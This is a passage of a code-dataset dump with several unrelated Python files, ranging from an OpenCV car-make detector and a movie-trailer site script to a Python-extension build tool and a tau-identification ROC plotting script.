\"Chevrolet\",\"Toyota\",\"BMW\",\"Kia\",\"Audi\",\"MercedesBenz\",\"Scion\",\"Mazda\",\"Dodge\"]\ncharDic = [item[0].upper()+item[1:] for item in charDic]\n\ndef getLargeMakeBox(orgImg):\n    (h, w, c) = orgImg.shape\n    blob = cv2.dnn.blobFromImage(orgImg, 0.007843, (400, 400), 127.5, False, False)\n    net_large.setInput(blob, \"data\")\n    detection = net_large.forward(\"detection_out\")\n    boxes = []\n    for i in np.arange(0, detection.shape[2]):\n        conf = detection[0, 0, i, 2]\n        indx = int(detection[0, 0, i, 1])\n        if conf <= 0:\n            continue\n        box = detection[0, 0, i, 3:7] * np.array([w, h, w, h])\n        (startX, startY, endX, endY) = box.astype(\"int\")\n        startX, startY = max(0, startX), max(0, startY)\n        endX, endY = min(endX, w), min(endY, h)\n        box = Box(charDic[indx], int(startX), int(startY),\n                  int(endX - startX), int(endY - startY), conf=conf)\n        boxes.append(box)\n    boxes =sorted(boxes, key=lambda box: -box.conf)\n    return boxes[0] if len(boxes) > 0 else \"None\"\n\ndef getMakeBox(orgImg):\n    large_box = getLargeMakeBox(orgImg)\n    if large_box==\"None\":\n        return \"None\",\"None\"\n    org_H, org_W = orgImg.shape[:2]\n\n    (x, y, w, h) = large_box.x, large_box.y, large_box.width, large_box.height\n    mid_x,mid_y = x+w//2,y+h/2\n\n    scale = 1\n    x1,y1 = max(0,mid_x-w*scale),max(0,mid_y-h*scale)\n    x2,y2 = 
min(mid_x+w*scale,org_W),min(mid_y+h*scale,org_H)\n    x1,y1,x2,y2=list(map(int,[x1,y1,x2,y2]))\n    w,h = int(w*scale*2),int(h*scale*2)\n    # Run detection again on the cropped small image\n    small_image = orgImg[y1:y2,x1:x2].copy()\n\n    blob=cv2.dnn.blobFromImage(small_image,0.007843,(400,400),127.5,False,False)\n    net_large.setInput(blob,\"data\")\n    detection=net_large.forward(\"detection_out\")\n    boxes=[]\n    for i in np.arange(0,detection.shape[2]):\n        conf=detection[0,0,i,2]\n        indx = int(detection[0, 0, i, 1])\n        if conf<=0:\n            continue\n        box=detection[0,0,i,3:7]*np.array([w,h,w,h])\n        (startX, startY, endX, endY) = box.astype(\"int\")\n        startX, startY = max(0, startX), max(0, startY)\n        endX, endY = min(endX, w), min(endY, h)\n        box = Box(charDic[indx], int(startX), int(startY),\n                  int(endX - startX), int(endY - startY), conf=conf)\n        boxes.append(box)\n    boxes=sorted(boxes,key=lambda box:-box.conf)\n    if len(boxes)<=0:\n        return \"None\",large_box\n    boxes[0].x += x1\n    boxes[0].y += y1\n    return boxes[0],large_box\n\nif __name__ == '__main__':\n    dir=\"Images/make_large\"\n    for image_name in os.listdir(dir):\n        image_path = os.path.join(dir,image_name)\n        image = cv2.imread(image_path)\n        box,large_box = getMakeBox(image)\n        print(box,large_box)\n        if large_box != \"None\":\n            (x, y, w, h) = large_box.x, large_box.y, large_box.width, large_box.height\n            cv2.rectangle(image, (x, y), (x + w, y + h), (0,255, 0))\n\n        if box != \"None\":\n            (x, y, w, h) = box.x, box.y, box.width, box.height\n            cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255))\n\n        cv2.imshow(\"image\",image)\n        cv2.waitKey()","sub_path":"LabelTool_attributes/LabelTool_attributes_V2/getMake.py","file_name":"getMake.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"451726040","text":"import media\r\nimport fresh_tomatoes\r\n\r\ntoy_story = media.Movie(\"Toy Story\",\r\n                        \"A story of a boy and his toys come to life\",\r\n                        \"http://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg\",\r\n                        \"https://www.youtube.com/watch?v=vxyZH85NQC4\")\r\n\r\n#print(toy_story.storyline)\r\n\r\navatar = media.Movie(\"Avatar\",\r\n                     \"A story of some blue aliens\",\r\n                     \"http://upload.wikimedia.org/wikipedia/id/b/b0/Avatar-Teaser-Poster.jpg\",\r\n                     \"https://www.youtube.com/watch?v=vxyZH85NQC4\")\r\n\r\n#print(avatar.title)\r\n\r\n#toy_story.show_trailer()\r\n\r\ninception = media.Movie(\"Inception\",\r\n                        \"Dreaming in dreams\",\r\n                        \"http://t2.gstatic.com/images?q=tbn:ANd9GcRo9vfJCM6dzPkZHIHBVCtlJnAnew9Ai26kEdrli0-tfmatmciD\",\r\n                        \"https://www.youtube.com/watch?v=YoHD9XEInc0\")\r\n\r\n#inception.show_trailer()\r\n\r\nschool_of_rock = media.Movie(\"School of Rock\",\r\n                             \"Using rock music to learn\",\r\n                             \"http://upload.wikimedia.org/wikipedia/en/1/11/School_of_Rock_Poster.jpg\",\r\n                             \"https://www.youtube.com/watch?v=vxyZH85NQC4\")\r\n\r\nratatoulli = media.Movie(\"Ratatouille\",\r\n                         \"A rat is a chef in Paris\",\r\n                         \"http://upload.wikimedia.org/wikipedia/en/5/50/RatatouillePoster.jpg\",\r\n                         \"https://www.youtube.com/watch?v=vxyZH85NQC4\")\r\n\r\nhunger_games = media.Movie(\"Hunger Games\",\r\n                           \"A really real reality show\",\r\n                           \"http://upload.wikimedia.org/wikipedia/en/4/42/HungerGamesPoster.jpg\",\r\n                           \"https://www.youtube.com/watch?v=vxyZH85NQC4\")\r\nmovies = [toy_story, avatar, inception, school_of_rock, ratatoulli, hunger_games]\r\n#fresh_tomatoes.open_movies_page(movies)\r\n\r\n# Testing class variable valid_ratings\r\n#print(media.Movie.VALID_RATINGS)\r\nprint(\"media.Movie.__?__\")\r\nprint(\"The 
name of the class is \"+media.Movie.__name__)\r\nprint(\"The name of the module is \"+media.Movie.__module__)\r\n\r\n","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"255802399","text":"import sys\nimport os\nimport copy\nimport distutils\nimport distutils.sysconfig\nimport re\nimport warnings\n\nfrom subprocess \\\n import \\\n Popen, PIPE, STDOUT\n\nfrom yaku.task_manager \\\n import \\\n topo_sort, build_dag, \\\n CompiledTaskGen, set_extension_hook\nfrom yaku.sysconfig \\\n import \\\n get_configuration, detect_distutils_cc\nfrom yaku.compiled_fun \\\n import \\\n compile_fun\nfrom yaku.task \\\n import \\\n Task\nfrom yaku.utils \\\n import \\\n ensure_dir\nfrom yaku.conftests \\\n import \\\n check_compiler, check_header\n\nimport yaku.tools\n\npylink, pylink_vars = compile_fun(\"pylink\", \"${PYEXT_SHLINK} ${PYEXT_LINK_TGT_F}${TGT[0].abspath()} ${PYEXT_LINK_SRC_F}${SRC} ${PYEXT_APP_LIBDIR} ${PYEXT_APP_LIBS} ${PYEXT_APP_FRAMEWORKS} ${PYEXT_SHLINKFLAGS}\", False)\n\npycc, pycc_vars = compile_fun(\"pycc\", \"${PYEXT_CC} ${PYEXT_CFLAGS} ${PYEXT_INCPATH} ${PYEXT_CC_TGT_F}${TGT[0].abspath()} ${PYEXT_CC_SRC_F}${SRC}\", False)\n\npycxx, pycxx_vars = compile_fun(\"pycxx\", \"${PYEXT_CXX} ${PYEXT_CXXFLAGS} ${PYEXT_INCPATH} ${PYEXT_CXX_TGT_F}${TGT[0].abspath()} ${PYEXT_CXX_SRC_F}${SRC}\", False)\n\npycxxlink, pycxxlink_vars = compile_fun(\"pycxxlink\", \"${PYEXT_CXXSHLINK} ${PYEXT_LINK_TGT_F}${TGT[0].abspath()} ${PYEXT_LINK_SRC_F}${SRC} ${PYEXT_APP_LIBDIR} ${PYEXT_APP_LIBS} ${PYEXT_APP_FRAMEWORKS} ${PYEXT_SHLINKFLAGS}\", False)\n\n# pyext env <-> sysconfig env conversion\n\n_SYS_TO_PYENV = {\n \"PYEXT_SHCC\": \"CC\",\n \"PYEXT_CCSHARED\": \"CCSHARED\",\n \"PYEXT_SHLINK\": \"LDSHARED\",\n \"PYEXT_SUFFIX\": \"SO\",\n \"PYEXT_CFLAGS\": \"CFLAGS\",\n \"PYEXT_OPT\": \"OPT\",\n \"PYEXT_LIBDIR\": \"LIBDIR\",\n}\n\n_PYENV_REQUIRED = [\n \"LIBDIR_FMT\",\n \"LIBS\",\n \"LIB_FMT\",\n \"CPPPATH_FMT\",\n \"CC_TGT_F\",\n \"CC_SRC_F\",\n \"LINK_TGT_F\",\n \"LINK_SRC_F\",\n]\n\n_SYS_TO_CCENV = {\n \"CC\": \"CC\",\n \"SHCC\": \"CCSHARED\",\n \"SHLINK\": \"LDSHARED\",\n \"SO\": \"SO\",\n \"CFLAGS\": \"CFLAGS\",\n \"OPT\": \"OPT\",\n \"LIBDIR\": \"LIBDIR\",\n \"LIBDIR_FMT\": \"LIBDIR_FMT\",\n \"LIBS\": \"LIBS\",\n \"LIB_FMT\": \"LIB_FMT\",\n \"CPPPATH_FMT\": \"CPPPATH_FMT\",\n \"CC_TGT_F\": \"CC_TGT_F\",\n \"CC_SRC_F\": \"CC_SRC_F\",\n \"CXX\": \"CXX\",\n \"CXXSHLINK\": \"CXXSHLINK\",\n}\n\ndef setup_pyext_env(ctx, cc_type=\"default\", use_distutils=True):\n pyenv = {}\n if use_distutils:\n if cc_type == \"default\":\n dist_env = get_configuration()\n else:\n dist_env = get_configuration(cc_type)\n else:\n dist_env = {\n \"CC\": [\"clang\"],\n \"CPPPATH\": [],\n \"BASE_CFLAGS\": [\"-fno-strict-aliasing\"],\n \"OPT\": [],\n \"SHARED\": [\"-fPIC\"],\n \"SHLINK\": [\"clang\", \"-shared\"],\n \"LDFLAGS\": [],\n \"LIBDIR\": [],\n \"LIBS\": [],\n \"SO\": \".so\"}\n dist_env[\"CPPPATH\"].append(distutils.sysconfig.get_python_inc())\n\n for name, value in dist_env.items():\n pyenv[\"PYEXT_%s\" % name] = value\n pyenv[\"PYEXT_FMT\"] = \"%%s%s\" % dist_env[\"SO\"]\n pyenv[\"PYEXT_CFLAGS\"] = pyenv[\"PYEXT_BASE_CFLAGS\"] + \\\n pyenv[\"PYEXT_OPT\"] + \\\n pyenv[\"PYEXT_SHARED\"]\n pyenv[\"PYEXT_SHLINKFLAGS\"] = dist_env[\"LDFLAGS\"]\n return pyenv\n\ndef pycc_hook(self, node):\n tasks = pycc_task(self, node)\n self.object_tasks.extend(tasks)\n return 
tasks\n\ndef pycc_task(self, node):\n base = self.env[\"CC_OBJECT_FMT\"] % node.name\n target = node.parent.declare(base)\n ensure_dir(target.abspath())\n\n task = Task(\"pycc\", inputs=[node], outputs=[target])\n task.gen = self\n task.env_vars = pycc_vars\n task.env = self.env\n task.func = pycc\n return [task]\n\ndef pycxx_hook(self, node):\n tasks = pycxx_task(self, node)\n self.object_tasks.extend(tasks)\n self.has_cxx = True\n return tasks\n\ndef pycxx_task(self, node):\n base = self.env[\"CXX_OBJECT_FMT\"] % node.name\n target = node.parent.declare(base)\n ensure_dir(target.abspath())\n\n task = Task(\"pycxx\", inputs=[node], outputs=[target])\n task.gen = self\n task.env_vars = pycxx_vars\n task.env = self.env\n task.func = pycxx\n return [task]\n\ndef pylink_task(self, name):\n objects = [tsk.outputs[0] for tsk in self.object_tasks]\n if len(objects) < 1:\n warnings.warn(\"task %s has no inputs !\" % name)\n def declare_target():\n folder, base = os.path.split(name)\n tmp = folder + os.path.sep + self.env[\"PYEXT_FMT\"] % base\n return self.bld.src_root.declare(tmp)\n target = declare_target()\n ensure_dir(target.abspath())\n\n task = Task(\"pylink\", inputs=objects, outputs=[target])\n task.gen = self\n task.func = pylink\n task.env_vars = pylink_vars\n self.link_task = task\n\n return [task]\n\n# XXX: fix merge env location+api\nfrom yaku.tools.ctasks import _merge_env\nclass PythonBuilder(object):\n def clone(self):\n return PythonBuilder(self.ctx)\n\n def __init__(self, ctx):\n self.ctx = ctx\n self.env = copy.deepcopy(ctx.env)\n self.compiler_type = \"default\"\n self.use_distutils = True\n\n def extension(self, name, sources, env=None):\n sources = [self.ctx.src_root.find_resource(s) for s in sources]\n return create_pyext(self.ctx, name, sources,\n _merge_env(self.env, env))\n\ndef get_builder(ctx):\n return PythonBuilder(ctx)\n\nCC_SIGNATURE = {\n \"gcc\": re.compile(\"gcc version\"),\n \"msvc\": re.compile(\"Microsoft \\(R\\) 32-bit C/C\\+\\+ Optimizing Compiler\")\n}\n\ndef detect_cc_type(ctx, cc_cmd):\n cc_type = None\n\n def detect_type(vflag):\n cmd = cc_cmd + [vflag]\n try:\n p = Popen(cmd, stdout=PIPE, stderr=STDOUT)\n out = p.communicate()[0].decode()\n for k, v in CC_SIGNATURE.items():\n m = v.search(out)\n if m:\n return k\n except OSError:\n pass\n return None\n\n sys.stderr.write(\"Detecting CC type... \")\n if sys.platform == \"win32\":\n for v in [\"\", \"-v\"]:\n cc_type = detect_type(v)\n else:\n for v in [\"-v\", \"-V\", \"-###\"]:\n cc_type = detect_type(v)\n if cc_type:\n break\n if cc_type is None:\n cc_type = \"cc\"\n sys.stderr.write(\"%s\\n\" % cc_type)\n return cc_type\n\ndef get_distutils_cc_exec(ctx, compiler_type=\"default\"):\n from distutils import ccompiler\n\n sys.stderr.write(\"Detecting distutils CC exec ... 
\")\n if compiler_type == \"default\":\n compiler_type = \\\n distutils.ccompiler.get_default_compiler()\n\n compiler = ccompiler.new_compiler(compiler=compiler_type)\n if compiler_type == \"msvc\":\n compiler.initialize()\n cc = [compiler.cc]\n else:\n cc = compiler.compiler_so\n sys.stderr.write(\"%s\\n\" % \" \".join(cc))\n return cc\n\ndef configure(ctx):\n # How we do it\n # 1: for distutils-based configuration\n # - get compile/flags flags from sysconfig\n # - detect yaku tool name from CC used by distutils:\n # - get the compiler executable used by distutils ($CC\n # variable)\n # - try to determine yaku tool name from $CC\n # - apply necessary variables from yaku tool to $PYEXT_\n # \"namespace\"\n compiler_type = ctx.builders[\"pyext\"].compiler_type\n\n if ctx.builders[\"pyext\"].use_distutils:\n dist_env = setup_pyext_env(ctx, compiler_type)\n ctx.env.update(dist_env)\n\n cc_exec = get_distutils_cc_exec(ctx, compiler_type)\n yaku_cc_type = detect_cc_type(ctx, cc_exec)\n\n _setup_compiler(ctx, yaku_cc_type)\n else:\n dist_env = setup_pyext_env(ctx, compiler_type, False)\n ctx.env.update(dist_env)\n _setup_compiler(ctx, compiler_type)\n\ndef _setup_compiler(ctx, cc_type):\n old_env = ctx.env\n ctx.env = {}\n cc_env = None\n sys.path.insert(0, os.path.dirname(yaku.tools.__file__))\n try:\n try:\n mod = __import__(cc_type)\n mod.setup(ctx)\n except ImportError:\n raise RuntimeError(\"No tool %s is available (import failed)\" \\\n % cc_type)\n\n # XXX: this is ugly - find a way to have tool-specific env...\n cc_env = ctx.env\n finally:\n sys.path.pop(0)\n ctx.env = old_env\n\n copied_values = [\"CPPPATH_FMT\", \"LIBDIR_FMT\", \"LIB_FMT\",\n \"CC_OBJECT_FMT\", \"CC_TGT_F\", \"CC_SRC_F\", \"LINK_TGT_F\",\n \"LINK_SRC_F\"]\n for k in copied_values:\n ctx.env[\"PYEXT_%s\" % k] = cc_env[k]\n\n def setup_cxx():\n old_env = ctx.env\n ctx.env = {}\n sys.path.insert(0, os.path.dirname(yaku.tools.__file__))\n try:\n mod = __import__(\"gxx\")\n mod.setup(ctx)\n cxx_env = ctx.env\n finally:\n sys.path.pop(0)\n ctx.env = old_env\n\n for k in [\"CXX\", \"CXXFLAGS\", \"CXX_TGT_F\", \"CXX_SRC_F\",\n \"CXXSHLINK\"]:\n ctx.env[\"PYEXT_%s\" % k] = cxx_env[k]\n setup_cxx()\n\ndef create_pyext(bld, name, sources, env):\n base = name.replace(\".\", os.sep)\n\n tasks = []\n\n task_gen = CompiledTaskGen(\"pyext\", bld, sources, name)\n task_gen.bld = bld\n old_hook = set_extension_hook(\".c\", pycc_hook)\n old_hook_cxx = set_extension_hook(\".cxx\", pycxx_hook)\n\n task_gen.env = env\n apply_cpppath(task_gen)\n apply_libpath(task_gen)\n apply_libs(task_gen)\n apply_frameworks(task_gen)\n\n tasks = task_gen.process()\n\n ltask = pylink_task(task_gen, base)\n if task_gen.has_cxx:\n task_gen.link_task.func = pycxxlink\n task_gen.link_task.env_vars = pycxxlink_vars\n\n tasks.extend(ltask)\n for t in tasks:\n t.env = task_gen.env\n\n set_extension_hook(\".c\", old_hook)\n set_extension_hook(\".cxx\", old_hook_cxx)\n bld.tasks.extend(tasks)\n\n outputs = []\n for t in ltask:\n outputs.extend(t.outputs)\n task_gen.outputs = outputs\n return tasks\n\n# FIXME: find a way to reuse this kind of code between tools\ndef apply_frameworks(task_gen):\n # XXX: do this correctly (platform specific tool config)\n if sys.platform == \"darwin\":\n frameworks = task_gen.env[\"PYEXT_FRAMEWORKS\"]\n task_gen.env[\"PYEXT_APP_FRAMEWORKS\"] = []\n for framework in frameworks:\n task_gen.env[\"PYEXT_APP_FRAMEWORKS\"].extend([\"-framework\", framework])\n else:\n task_gen.env[\"PYEXT_APP_FRAMEWORKS\"] = []\n\ndef 
apply_libs(task_gen):\n libs = task_gen.env[\"PYEXT_LIBS\"]\n task_gen.env[\"PYEXT_APP_LIBS\"] = [\n task_gen.env[\"PYEXT_LIB_FMT\"] % lib for lib in libs]\n\ndef apply_libpath(task_gen):\n libdir = task_gen.env[\"PYEXT_LIBDIR\"]\n #implicit_paths = set([\n # os.path.join(task_gen.env[\"BLDDIR\"], os.path.dirname(s))\n # for s in task_gen.sources])\n implicit_paths = []\n libdir = list(implicit_paths) + libdir\n task_gen.env[\"PYEXT_APP_LIBDIR\"] = [\n task_gen.env[\"PYEXT_LIBDIR_FMT\"] % d for d in libdir]\n\ndef apply_cpppath(task_gen):\n cpppaths = task_gen.env[\"PYEXT_CPPPATH\"]\n implicit_paths = set([s.parent.srcpath() \\\n for s in task_gen.sources])\n srcnode = task_gen.sources[0].ctx.srcnode\n\n relcpppaths = []\n for p in cpppaths:\n if not os.path.isabs(p):\n node = srcnode.find_node(p)\n assert node is not None, \"could not find %s\" % p\n relcpppaths.append(node.bldpath())\n else:\n relcpppaths.append(p)\n cpppaths = list(implicit_paths) + relcpppaths\n task_gen.env[\"PYEXT_INCPATH\"] = [\n task_gen.env[\"PYEXT_CPPPATH_FMT\"] % p\n for p in cpppaths]\n","sub_path":"bento/private/_yaku/yaku/tools/pyext.py","file_name":"pyext.py","file_ext":"py","file_size_in_byte":11668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"494839704","text":"#!/usr/bin/env python\n\nimport argparse\nparser = argparse.ArgumentParser(description='Apply training and store results.')\nparser.add_argument('--input-taus', required=True, type=str, help=\"Input file with taus\")\nparser.add_argument('--input-other', required=False, default=None, type=str, help=\"Input file with non-taus\")\nparser.add_argument('--other-type', required=True, type=str, help=\"Type of non-tau objects\")\nparser.add_argument('--deep-results', required=True, type=str, help=\"Directory with deepId results\")\nparser.add_argument('--setup', required=True, type=str, help=\"Path to the file with the plot setup definition\")\nparser.add_argument('--setup-args', required=False, default='', type=str,\n help=\"Comma separated arguments for the plot setup module. E.g. 
arg1=value1,arg2=value2 etc.\")\nparser.add_argument('--weights', required=False, default=None, type=str,\n help=\"Directory with weights to correct the spectrum\")\nparser.add_argument('--prev-deep-results', required=False, default=None, type=str,\n help=\"Directory with previous deepId results\")\nparser.add_argument('--deep-results-label', required=False, default='', type=str,\n help=\"Label for deepId results\")\nparser.add_argument('--prev-deep-results-label', required=False, default='', type=str,\n help=\"Label for deepId results\")\nparser.add_argument('--output', required=True, type=str, help=\"Output pdf file\")\nparser.add_argument('--draw-wp', action=\"store_true\", help=\"Draw working points for raw discriminators\")\nparser.add_argument('--store-json', action=\"store_true\", help=\"Store ROC curves in JSON format\")\nparser.add_argument('--inequality-in-title', action=\"store_true\",\n help=\"Use inequality in the title to define pt range, instead of an interval\")\nparser.add_argument('--public-plots', action=\"store_true\", help=\"Apply public plot styles\")\n\nargs = parser.parse_args()\n\nimport os\nimport sys\nimport math\nimport pandas\nimport numpy as np\nimport json\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport eval_tools\nimport common\n\ndef AddPredictionsToDataFrame(df, file_name, label = ''):\n df_pred = pandas.read_hdf(file_name)\n for out in common.match_suffixes:\n if out != 'tau':\n tau_vs_other = common.TauLosses.tau_vs_other(df_pred['deepId_tau'].values, df_pred['deepId_' + out].values)\n df['deepId{}_vs_{}'.format(label, out)] = pandas.Series(tau_vs_other, index=df.index)\n df['deepId{}_{}'.format(label, out)] = pandas.Series(df_pred['deepId_' + out].values, index=df.index)\n return df\n\ndef AddWeightsToDataFrame(df, file_name):\n df_weights = pandas.read_hdf(file_name)\n df['weight'] = pandas.Series(df_weights.weight.values, index=df.index)\n return df\n\ndef CreateDF(file_name, tau_types, setup_provider):\n df = eval_tools.ReadBrancesToDataFrame(file_name, 'taus', all_branches)\n base_name = os.path.basename(file_name)\n pred_file_name = os.path.splitext(base_name)[0] + '_pred.h5'\n AddPredictionsToDataFrame(df, os.path.join(args.deep_results, pred_file_name))\n if args.weights is not None:\n weight_file_name = os.path.splitext(base_name)[0] + '_weights.h5'\n AddWeightsToDataFrame(df, os.path.join(args.weights, weight_file_name))\n else:\n df['weight'] = pandas.Series(np.ones(df.shape[0]), index=df.index)\n has_prev_results = len(args.prev_deep_results_label) > 0 and 'None' not in args.prev_deep_results_label\n if has_prev_results:\n AddPredictionsToDataFrame(df, os.path.join(args.prev_deep_results, pred_file_name),\n args.prev_deep_results_label)\n df['tau_pt'] = pandas.Series(df.tau_pt *(1000 - 20) + 20, index=df.index)\n if hasattr(setup_provider, \"DefineBranches\"):\n df = setup_provider.DefineBranches(df, tau_types)\n sel = None\n for tau_type in tau_types:\n tau_sel = df['gen_{}'.format(tau_type)] == 1\n if sel is None:\n sel = tau_sel\n else:\n sel = sel | tau_sel\n if sel is not None:\n df = df[sel]\n return df\n\nif sys.version_info.major > 2:\n import importlib.util\n spec = importlib.util.spec_from_file_location('setup_provider', args.setup)\n setup_provider = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(setup_provider)\nelse:\n import imp\n setup_provider = imp.load_source('setup_provider', args.setup)\n\nsetup_args = 
{}\nsetup_args_list = [ s.strip() for s in args.setup_args.split(',') if len(s.strip()) > 0 ]\nfor setup_arg in setup_args_list:\n    split_arg = setup_arg.split('=')\n    if len(split_arg) != 2:\n        raise RuntimeError('Invalid setup argument = \"{}\".'.format(setup_arg))\n    setup_args[split_arg[0]] = split_arg[1]\n\nsetup_provider.Initialize(eval_tools, setup_args)\n\ndiscriminators = setup_provider.GetDiscriminators(args.other_type, args.deep_results_label,\n                                                  args.prev_deep_results_label)\n\ncore_branches = [ 'tau_pt', 'tau_decayModeFinding', 'tau_decayMode', 'gen_{}'.format(args.other_type), 'gen_tau',\n                  'tau_charge', 'lepton_gen_charge' ]\n\nall_branches = []\nall_branches.extend(core_branches)\nif hasattr(setup_provider, 'setup_branches'):\n    all_branches.extend(setup_provider.setup_branches)\nfor disc in discriminators:\n    if disc.from_tuple:\n        all_branches.append(disc.column)\n        if disc.wp_column != disc.column:\n            all_branches.append(disc.wp_column)\n\nif args.input_other is None:\n    df_all = CreateDF(args.input_taus, ['tau', args.other_type], setup_provider)\nelse:\n    df_taus = CreateDF(args.input_taus, ['tau'], setup_provider)\n    df_other = CreateDF(args.input_other, [args.other_type], setup_provider)\n    df_all = df_taus.append(df_other)\nif hasattr(setup_provider, 'ApplySelection'):\n    df_all = setup_provider.ApplySelection(df_all, args.input_other)\n\npt_bins = setup_provider.GetPtBins()\n\nplot_setup = setup_provider.GetPlotSetup(args.other_type)\n\nroc_json = []\n\nwith PdfPages(args.output) as pdf:\n    for pt_index in range(len(pt_bins) - 1):\n        df_tx = df_all[(df_all.tau_pt > pt_bins[pt_index]) & (df_all.tau_pt < pt_bins[pt_index + 1])]\n        if df_tx.shape[0] == 0:\n            print(\"Warning: pt bin ({}, {}) is empty.\".format(pt_bins[pt_index], pt_bins[pt_index + 1]))\n            continue\n        n_discr = len(discriminators)\n        rocs = [None] * n_discr\n        wp_rocs = [None] * n_discr\n        names = [ disc.name for disc in discriminators ]\n\n        roc_json_entry = {\n            'pt_min': pt_bins[pt_index], 'pt_max': pt_bins[pt_index + 1], 'discriminators': [], 'plot_setup': { },\n        }\n\n        for param_name in [ 'ylabel', 'yscale', 'ratio_yscale', 'legend_loc', 'ratio_ylabel_pad']:\n            val = getattr(plot_setup, param_name)\n            if val is not None:\n                roc_json_entry['plot_setup'][param_name] = val\n\n        x_range = 1\n        for lim_name in [ 'x', 'y', 'ratio_y' ]:\n            lim = getattr(plot_setup, lim_name + 'lim')\n            if lim is not None:\n                lim = lim[pt_index] if type(lim[0]) == list else lim\n                roc_json_entry['plot_setup'][lim_name + '_min'] = lim[0]\n                roc_json_entry['plot_setup'][lim_name + '_max'] = lim[1]\n                if lim_name == 'x':\n                    x_range = lim[1] - lim[0]\n\n        for n in reversed(range(n_discr)):\n            ref_roc = rocs[-1]\n            rocs[n], wp_rocs[n] = discriminators[n].CreateRocCurve(df_tx, ref_roc)\n            if rocs[n].auc_score is not None:\n                #target_prs = [0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 0.95, 0.99, 0.995 ]\n                #thrs = [ find_threshold(rocs[n].pr[1, :], rocs[n].thresholds, pr) for pr in target_prs ]\n                print('[{}, {}] {} roc_auc = {}'.format(pt_bins[pt_index], pt_bins[pt_index + 1], names[n],\n                                                        rocs[n].auc_score))\n                #print(thrs)\n            #print(discriminators[n].name)\n            name_suffix = ''\n            for roc in [ rocs[n].Prune(tpr_decimals=max(0, round(math.log10(1000 / x_range)))), wp_rocs[n] ]:\n                if roc is None: continue\n\n                discr_data = {\n                    'name': discriminators[n].name + name_suffix,\n                    'false_positive_rate': eval_tools.FloatList(roc.pr[0, :].tolist()),\n                    'true_positive_rate': eval_tools.FloatList(roc.pr[1, :].tolist()),\n                    'is_ref': n == n_discr - 1,\n                    'color': roc.color,\n                    'auc_score': 
roc.auc_score,\n 'dots_only': roc.dots_only,\n 'dashed': roc.dashed,\n 'marker_size': roc.marker_size,\n }\n if roc.thresholds is not None:\n discr_data['thresholds'] = eval_tools.FloatList(roc.thresholds.tolist())\n if roc.pr_err is not None:\n discr_data['false_positive_rate_up'] = eval_tools.FloatList(roc.pr_err[0, 0, :].tolist())\n discr_data['false_positive_rate_down'] = eval_tools.FloatList(roc.pr_err[0, 1, :].tolist())\n discr_data['true_positive_rate_up'] = eval_tools.FloatList(roc.pr_err[1, 0, :].tolist())\n discr_data['true_positive_rate_down'] = eval_tools.FloatList(roc.pr_err[1, 1, :].tolist())\n roc_json_entry['discriminators'].insert(0, discr_data)\n name_suffix = ' WP'\n\n\n fig, (ax, ax_ratio) = plt.subplots(2, 1, figsize=(7, 7), sharex=True,\n gridspec_kw = {'height_ratios':[3, 1]})\n\n plot_entries = []\n for n in range(n_discr):\n entry = rocs[n].Draw(ax, ax_ratio)\n plot_entries.append(entry)\n for n in range(n_discr):\n if wp_rocs[n] is not None:\n wp_rocs[n].Draw(ax, ax_ratio)\n\n ratio_title = 'MVA/DeepTau' if args.other_type != 'mu' else 'cut based/DeepTau'\n plot_setup.Apply(names, plot_entries, pt_index, ratio_title, ax, ax_ratio)\n\n roc_json_entry['plot_setup']['ratio_title'] = ratio_title\n roc_json_entry['period'] = '2017 (13 TeV)'\n if args.public_plots:\n header_y = 1.02\n # ax.text(0.03, 0.90, r'$p_T\\in ({}, {})$ GeV'.format(pt_bins[pt_index], pt_bins[pt_index + 1]),\n # fontsize=14, transform=ax.transAxes)\n if pt_bins[pt_index + 1] == 1000:\n pt_text = r'$p_T > {}$ GeV'.format(pt_bins[pt_index])\n elif pt_bins[pt_index] == 20:\n pt_text = r'$p_T < {}$ GeV'.format(pt_bins[pt_index + 1])\n else:\n pt_text = r'$p_T\\in ({}, {})$ GeV'.format(pt_bins[pt_index], pt_bins[pt_index + 1])\n roc_json_entry['pt_text'] = pt_text\n ax.text(0.03, 0.92 - n_discr * 0.10, pt_text, fontsize=14, transform=ax.transAxes)\n ax.text(0.01, header_y, 'CMS', fontsize=14, transform=ax.transAxes, fontweight='bold',\n fontfamily='sans-serif')\n ax.text(0.12, header_y, 'Simulation Preliminary', fontsize=14, transform=ax.transAxes, fontstyle='italic',\n fontfamily='sans-serif')\n ax.text(0.73, header_y, '2017 (13 TeV)', fontsize=13, transform=ax.transAxes, fontweight='bold',\n fontfamily='sans-serif')\n else:\n if args.inequality_in_title and (pt_bins[pt_index] == 20 or pt_bins[pt_index + 1] == 1000) \\\n and not (pt_bins[pt_index] == 20 and pt_bins[pt_index + 1] == 1000):\n if pt_bins[pt_index] == 20:\n title_str = 'tau vs {}. pt < {} GeV'.format(args.other_type, pt_bins[pt_index + 1])\n else:\n title_str = 'tau vs {}. pt > {} GeV'.format(args.other_type, pt_bins[pt_index])\n else:\n title_str = 'tau vs {}. pt range ({}, {}) GeV'.format(args.other_type, pt_bins[pt_index],\n pt_bins[pt_index + 1])\n roc_json_entry['pt_text'] = title_str\n ax.set_title(title_str, fontsize=18, y=1.04)\n plt.subplots_adjust(hspace=0)\n pdf.savefig(fig, bbox_inches='tight')\n roc_json.append(roc_json_entry)\n\nif args.store_json:\n with open(os.path.splitext(args.output)[0] + '.json', 'w') as json_file:\n json_file.write(json.dumps(roc_json, indent=4, cls=eval_tools.CustomJsonEncoder))\n","sub_path":"Training/python/evaluate_performance.py","file_name":"evaluate_performance.py","file_ext":"py","file_size_in_byte":12615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"454865570","text":"\n# coding: utf-8\n\n# # Tensorflow Demo: MNIST for Experts\n# \n# 